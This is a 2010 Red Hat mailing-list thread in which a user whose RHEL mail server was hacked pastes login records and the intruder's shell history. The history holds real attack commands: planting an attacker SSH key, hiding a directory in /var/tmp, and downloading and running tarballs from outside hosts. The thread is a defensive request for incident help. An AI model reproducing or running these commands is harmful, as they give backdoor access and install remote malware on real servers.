help
Joy Methew
ml4joy at gmail.com
Thu Jan 28 06:30:08 UTC 2010
i use putty for remotely login
On Thu, Jan 28, 2010 at 11:59 AM, Joy Methew <ml4joy at gmail.com> wrote:
> still i m thinking how he/she got my password??
>
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy at gmail.com> wrote:
>
>> i have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <
>> Wahyu.Darmawan at ag-it.com> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces at redhat.com [redhat-list-bounces at redhat.com] On
>>> Behalf Of Joy Methew [ml4joy at gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> i m using RHEL5.3 as a my mail server with real ip.i
>>> configure my system mostly remotely.last login time of my system 27 jan
>>> from this ip 118.129.153.43.
>>> than i try to login at 28 jan in morning so i can`t got authentication as
>>> root from my last password.
>>> than i reboot the system reset my password.
>>> i login as a root than i run "last" command i m sending tha first 10
>>> lines
>>> of last command...i thinks someone hack my system.i am sending history
>>> command output.
>>> now i remove .ssh directory and /var/tmp/*
>>>
>>> please suggest wat is this??
>>>
>>> thanks
>>>
>>> last command out put:
>>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>>
>>> What is 165.red-79........this is nt my ip.
>>>
>>>
>>> History Output
>>>
>>> 115 cat /proc/cpuinfo
>>> 116 mkdir .ssh
>>> 117 cd .ssh
>>> 118 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>> 119 cd /var/tmp
>>> 120 mkdir " "
>>> 121 cd " "
>>> 122 passwd
>>> 123 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>> 124 ps -x
>>> 125 cd /var/tmp
>>> 126 w
>>> 127 wget http://kok.ucoz.de/gosh.tgz
>>> 128 tar xvf gosh.tgz
>>> 129 cd gosh
>>> 130 chmod +x *
>>> 131 ./go.sh 121
>>> 132 w
>>> 133 ps -x
>>> 134 ps -aux
>>> 135 cd /var/tmp
>>> 136 cd " "
>>> 137 ls -a
>>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139 tar xzvf fld.tgz
>>> 140 cd fld
>>> 141 chmod +x *
>>> 142 nano cyc.acc
>>> 143 nano cyc.acc.1
>>> 144 nano cyc.set
>>> 145 ./httpd
>>> 146 w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
>
More information about the redhat-list
mailing list